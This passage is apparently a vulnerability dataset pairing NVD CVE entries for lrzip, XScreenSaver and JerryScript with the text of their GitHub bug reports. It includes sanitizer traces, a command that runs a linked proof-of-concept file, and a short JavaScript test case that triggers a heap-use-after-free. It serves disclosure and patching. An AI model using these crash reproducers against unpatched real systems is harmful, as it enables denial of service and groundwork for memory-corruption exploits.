0x7f8120d2e41c in clone (/lib/x86_64-linux-gnu/libc.so.6+0x10741c) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../stream.c:1523 ucompthread Thread T3 created by T0 here: #0 0x7f81221941e3 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x361e3) #1 0x4516f3 in create_pthread ../stream.c:133 #2 0x4516f3 in fill_buffer ../stream.c:1699 #3 0x4516f3 in read_stream ../stream.c:1786 ==161258==ABORTING ~~~~
Segmentation fault caused by null pointer dereference during multithread processing in ucompthread, stream.c:1523
https://api.github.com/repos/ckolivas/lrzip/issues/164/comments
5
2020-09-02T08:51:40Z
2022-04-09T15:20:37Z
https://github.com/ckolivas/lrzip/issues/164
690,841,432
164
2,029
CVE-2021-27347
2021-06-10T16:15:08.100
Use after free in lzma_decompress_buf function in stream.c in Irzip 0.631 allows attackers to cause Denial of Service (DoS) via a crafted compressed file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ckolivas/lrzip/issues/165" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ckolivas/lrzip/issues/165" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00012.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:long_range_zip_project:long_range_zip:0.631:*:*:*:*:*:*:*", "matchCriteriaId": "1808BE16-400E-4C1B-A88C-7C03BD427F5C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/ckolivas/lrzip/issues/165
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ckolivas", "lrzip" ]
Hi, there. I find there is use after free issue in multithread processing in stream.c in the newest master branch 597be1f. The reason is that the buffer is unchecked during a multithread stream read. Here is the detailed explanation: <img width="1160" alt="image" src="https://user-images.githubusercontent.com/7632714/92203219-3725c400-eeb3-11ea-8520-ccce9b80d410.png"> <img width="1154" alt="image" src="https://user-images.githubusercontent.com/7632714/92203316-69cfbc80-eeb3-11ea-84bc-ac875b78fc22.png"> <img width="939" alt="image" src="https://user-images.githubusercontent.com/7632714/92203380-9edc0f00-eeb3-11ea-93be-1a17382d4a9b.png"> <img width="1608" alt="image" src="https://user-images.githubusercontent.com/7632714/92203465-ccc15380-eeb3-11ea-91ae-6fd175f20f80.png"> The high-level reason is similar to issue #164, but the program behavior/path is different. To reproduce, run ~~~~ lrzip -t uaf-stream546.lrz ~~~~ **Since it is a problem in the multithread program, you might need to run this command multiple times to trigger.** POC (unzip first): [uaf-stream546.lrz.zip](https://github.com/ckolivas/lrzip/files/5172892/uaf-stream546.lrz.zip) Here is the output from the terminal: ~~~~ Decompressing... Bad checksum: 0x5b496f91 - expected: 0x2000210c Segmentation fault ~~~~ This is the trace reported by ASAN: ~~~~ ==163048==ERROR: AddressSanitizer: heap-use-after-free on address 0x62000000f0e0 at pc 0x000000440f8c bp 0x7ff7bdffdd70 sp 0x7ff7bdffdd60 Fatal error - exiting WRITE of size 8 at 0x62000000f0e0 thread T3 #0 0x440f8b in lzma_decompress_buf ../stream.c:546 #1 0x440f8b in ucompthread ../stream.c:1526 #2 0x7ff7c1d366b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #3 0x7ff7c116841c in clone (/lib/x86_64-linux-gnu/libc.so.6+0x10741c) 0x62000000f0e0 is located 96 bytes inside of 3936-byte region [0x62000000f080,0x62000000ffe0) freed by thread T0 here: #0 0x7ff7c263032a in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9832a) #1 0x454a42 in close_stream_in ../stream.c:1870 previously allocated by thread T0 here: #0 0x7ff7c26307fa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987fa) #1 0x44c8f0 in open_stream_in ../stream.c:1080 Thread T3 created by T0 here: #0 0x7ff7c25ce1e3 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x361e3) #1 0x4516f3 in create_pthread ../stream.c:133 #2 0x4516f3 in fill_buffer ../stream.c:1699 #3 0x4516f3 in read_stream ../stream.c:1786 SUMMARY: AddressSanitizer: heap-use-after-free ../stream.c:546 lzma_decompress_buf Shadow bytes around the buggy address: 0x0c407fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c407fff9e10: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd 0x0c407fff9e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c407fff9e30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c407fff9e40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c407fff9e50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c407fff9e60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==163048==ABORTING ~~~~
Segmentation fault casued by use after free in multithread process from close_stream_in, stream:1870 to lzma_decompress_buf, stream:546
https://api.github.com/repos/ckolivas/lrzip/issues/165/comments
3
2020-09-04T05:44:38Z
2022-04-09T15:20:05Z
https://github.com/ckolivas/lrzip/issues/165
692,747,226
165
2,030
CVE-2021-34557
2021-06-10T16:15:08.227
XScreenSaver 5.45 can be bypassed if the machine has more than ten disconnectable video outputs. A buffer overflow in update_screen_layout() allows an attacker to bypass the standard screen lock authentication mechanism by crashing XScreenSaver. The attacker must physically disconnect many video outputs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/06/11/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/07/06/2" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/QubesOS/qubes-issues/issues/6595" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-068-2021.txt" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/QubesOS/qubes-xscreensaver/blob/master/0001-Fix-updating-outputs-info.patch" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TC4QB7TRS4GS7LDXQQ4PC6J3LVFJYISV/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2021/06/05/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/06/11/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/07/06/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/QubesOS/qubes-issues/issues/6595" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-068-2021.txt" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/QubesOS/qubes-xscreensaver/blob/master/0001-Fix-updating-outputs-info.patch" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TC4QB7TRS4GS7LDXQQ4PC6J3LVFJYISV/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2021/06/05/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xscreensaver_project:xscreensaver:5.45:*:*:*:*:*:*:*", "matchCriteriaId": "849AE900-753F-4BF8-9F31-C2EC13605D23", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/QubesOS/qubes-issues/issues/6595
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "QubesOS", "qubes-issues" ]
<!--(Before filing this report, please read: https://www.qubes-os.org/doc/reporting-bugs/)--> **Qubes OS version** <!--(The version of Qubes OS you're using (e.g., `R4.0`), available via the command `cat /etc/qubes-release` in a dom0 terminal.)--> 4.0.4 **Affected component(s) or functionality** <!--(The component or functionality of Qubes OS that is not working as expected.)--> Screensaver, locking with Ctrl-Alt-L **Brief summary** <!--(A clear and concise summary of the bug.)--> Nothing happens when trying to lock the screen. No logs. Screensaver IS set to autostart already. And it works for some time. But after some time, (not sure about the exact cause), inactivity timer does not lock the screen, nor the screen lock shortcut works. When I open the Xfce Screensaver panel, it complains about the screensaver daemon being not running. Even after starting the daemon, same thing happens after some time. As there is no log at all, I cannot trace the cause. **How Reproducible** <!--(At what rate does the bug occur when the steps to reproduce are performed?)--> This started a few days ago, probably after applying a UEFI firmware update. The bug is always present since then, I guess. **To Reproduce** Steps to reproduce the behavior: 1. boot the system 2. log in. do some work. 3. the computer won't lock when you expect it to lock its screen **Expected behavior** <!--(A clear and concise description of what you expected to happen.)--> The lock should work. **Actual behavior** <!--(What actually happened instead of what you expected to happen.)--> Lock is disabled **Screenshots** <!--(If applicable, add screenshots to help explain your problem.)--> **Additional context** <!--(Add any other context about the problem here.)--> It might be considered a security issue as well, I did not notice that the screen was not locked but had the impression that it was. **Solutions you've tried** <!--(If applicable, any solutions or workarounds you've already tried.)--> starting the xscreensaver using the respective xfce settings panel **Relevant [documentation](https://www.qubes-os.org/doc/) you've consulted** <!--(A list of links to the Qubes documentation (or other relevant software documentation) pages you have already consulted.)--> Found some basic info that suggests to restart the screensaver, to put it into autostart (which already appears in session and startup panel as a ticked item) **Related, [non-duplicate](https://www.qubes-os.org/doc/reporting-bugs/#new-issues-should-not-be-duplicates-of-existing-issues) issues** <!--(A list of links to other bug reports, feature requests, or tasks in the qubes-issues tracker (or "none" if you didn't find any). Do not describe any other unreported bugs, features, or tasks here.)--> (could not find any)
Disconnecting a video output can cause XScreenSaver to crash (QSB-068, CVE-2021-34557)
https://api.github.com/repos/QubesOS/qubes-issues/issues/6595/comments
37
2021-05-11T00:39:44Z
2025-01-18T17:06:30Z
https://github.com/QubesOS/qubes-issues/issues/6595
885,481,650
6,595
2,031
CVE-2020-23302
2021-06-10T23:15:07.740
There is a heap-use-after-free at ecma-helpers-string.c:772 in ecma_ref_ecma_string in JerryScript 2.2.0
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3748" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3748" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/jerryscript-project/jerryscript/issues/3748
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision bd1c4df ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on ###### Test case var o = [] function add(i) { delete o[i & 31]; new RegExp([ '"\\u', ], "g").exec(1); } for (var i = 0; i < 130; i++) { add(i) } ###### Output ================================================================= ==97694==ERROR: AddressSanitizer: heap-use-after-free on address 0xf61005b0 at pc 0x080605b2 bp 0xff856d28 sp 0xff856d18 READ of size 4 at 0xf61005b0 thread T0 #0 0x80605b1 in ecma_ref_ecma_string /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:772 #1 0x808ef54 in ecma_regexp_create_props /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:144 #2 0x808f562 in ecma_op_regexp_initialize /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:322 #3 0x808f850 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:393 #4 0x80dd0ed in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:179 #5 0x80dd154 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:223 #6 0x807ae83 in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1160 #7 0x8084a81 in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1229 #8 0x80b7b62 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:849 #9 0x80c2df8 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4151 #10 0x80c32fb in vm_run /home/jerryscript/jerry-core/vm/vm.c:4232 #11 0x8083ff1 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:886 #12 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085 #13 0x80b75f1 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:764 #14 0x80c2de5 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4130 #15 0x80c32fb in vm_run /home/jerryscript/jerry-core/vm/vm.c:4232 #16 0x80b6f6a in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:321 #17 0x804e249 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:596 #18 0x804ad3f in main /home/jerryscript/jerry-main/main-unix.c:759 #19 0xf7875636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #20 0x8049030 (/home/jerryscript/build/bin/jerry+0x8049030) 0xf61005b0 is located 0 bytes inside of 15-byte region [0xf61005b0,0xf61005bf) freed by thread T0 here: #0 0xf7aa9a84 in free (/usr/lib32/libasan.so.2+0x96a84) #1 0x8095b14 in jmem_heap_free_block_internal /home/jerryscript/jerry-core/jmem/jmem-heap.c:476 #2 0x8095eac in jmem_heap_free_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:685 #3 0x80c3453 in ecma_dealloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:208 #4 0x806096f in ecma_destroy_ecma_string /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:844 #5 0x8060740 in ecma_deref_ecma_string /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:816 #6 0x808f7e1 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:384 #7 0x80dd0ed in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:179 #8 0x80dd154 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:223 #9 0x807ae83 in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1160 #10 0x8084a81 in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1229 #11 0x80b7b62 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:849 #12 0x80c2df8 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4151 #13 0x80c32fb in vm_run /home/jerryscript/jerry-core/vm/vm.c:4232 #14 0x8083ff1 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:886 #15 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085 #16 0x80b75f1 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:764 #17 0x80c2de5 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4130 #18 0x80c32fb in vm_run /home/jerryscript/jerry-core/vm/vm.c:4232 #19 0x80b6f6a in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:321 #20 0x804e249 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:596 #21 0x804ad3f in main /home/jerryscript/jerry-main/main-unix.c:759 #22 0xf7875636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) previously allocated by thread T0 here: #0 0xf7aa9dee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x809581b in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80958eb in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x809596a in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8066032 in ecma_stringbuilder_create_from /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:2456 #5 0x80c8f17 in ecma_builtin_array_prototype_join /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:368 #6 0x80cd66a in ecma_builtin_array_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2653 #7 0x807aa06 in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1095 #8 0x807abac in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1119 #9 0x8083dce in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:782 #10 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085 #11 0x80c885f in ecma_builtin_array_prototype_object_to_string /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:151 #12 0x80cd4d5 in ecma_builtin_array_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2596 #13 0x807aa06 in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1095 #14 0x807abac in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1119 #15 0x8083dce in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:782 #16 0x8084716 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1085 #17 0x80877f8 in ecma_op_general_object_ordinary_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:324 #18 0x8087718 in ecma_op_general_object_default_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:289 #19 0x808bc85 in ecma_op_object_default_value /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1720 #20 0x80803b5 in ecma_op_to_primitive /home/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:199 #21 0x80809c0 in ecma_op_to_string /home/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:413 #22 0x809322a in ecma_regexp_read_pattern_str_helper /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1618 #23 0x808f694 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:352 #24 0x80dd0ed in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:179 #25 0x80dd154 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:223 #26 0x807ae83 in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1160 #27 0x8084a81 in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1229 #28 0x80b7b62 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:849 #29 0x80c2df8 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4151 SUMMARY: AddressSanitizer: heap-use-after-free /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:772 ecma_ref_ecma_string Shadow bytes around the buggy address: 0x3ec20060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec200b0: fa fa fa fa fa fa[fd]fd fa fa fd fa fa fa fd fa 0x3ec200c0: fa fa 00 07 fa fa 00 05 fa fa 00 07 fa fa fd fd 0x3ec200d0: fa fa 00 00 fa fa 00 05 fa fa 00 05 fa fa 00 07 0x3ec200e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd 0x3ec200f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==97694==ABORTING Credits: This vulnerability is detected by chong from OWL337.
heap-use-after-free in the ecma_ref_ecma_string
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3748/comments
0
2020-05-17T03:19:15Z
2020-05-20T10:10:06Z
https://github.com/jerryscript-project/jerryscript/issues/3748
619,599,547
3,748
2,032
CVE-2020-23303
2021-06-10T23:15:07.780
There is a heap-buffer-overflow at jmem-poolman.c:165 in jmem_pools_collect_empty in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3749" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3749" } ]
